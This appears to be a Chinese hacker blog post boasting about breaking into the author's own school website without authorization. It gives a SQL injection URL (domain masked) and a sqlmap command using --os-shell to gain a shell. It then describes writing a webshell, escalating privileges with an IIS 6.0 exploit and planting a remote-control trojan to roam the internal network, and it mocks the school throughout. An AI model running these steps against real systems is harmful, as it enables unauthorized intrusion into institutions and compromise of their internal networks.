轻松入侵我学校网站
先上图:
START
注入点:http://www.xxxxx.com//manager/hello.aspx?id=261
看看数据库权限:
current-user
对于一个神级别一样的垃圾学校,想怎么日怎么日。sa
sa权限可以直接读取文件,再次过程中使用很多工具,读取目录。速度不堪入目。后来一个朋友说sqlmap的线程。果断给把线程弄到10了。
http://www.xxxxx.com//manager/hello.aspx?id=261 --os-shell --threads 10
很快便得到了网站的路径
e:\YBWebSite
直接sqlmap写shell
然后ii6.0exp秒提。内网又没外网服务器映射?直接远控挂起!
其实内网漫游了,有时间写文,
THE END
By:珍惜少年时博客:http://www.cnblogs.com/xishaonian/
*-------------------------------------------*